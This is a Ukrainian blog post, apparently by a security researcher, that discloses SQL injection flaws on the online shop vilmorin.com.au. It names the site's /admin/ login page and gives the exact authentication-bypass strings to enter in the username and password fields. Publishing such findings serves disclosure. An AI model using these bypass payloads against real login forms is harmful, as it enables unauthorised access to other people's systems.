Уразливості на www.vilmorin.com.au

16:08 27.09.2010

08.02.2010

У травні, 24.05.2009, я знайшов SQL Injection уразливості на сайті http://www.vilmorin.com.au (онлайн магазин). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на rozetka.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

27.09.2010

SQL Injection (Auth Bypass):

На сторінці http://www.vilmorin.com.au/admin/

admin’ or 1=’1
В полі username.

‘ or ‘1′=’1
В полі password.

Зараз сайт не працює. Схоже, що замість виправлення дірок, власники сайта вірішили його закрити.


Leave a Reply

You must be logged in to post a comment.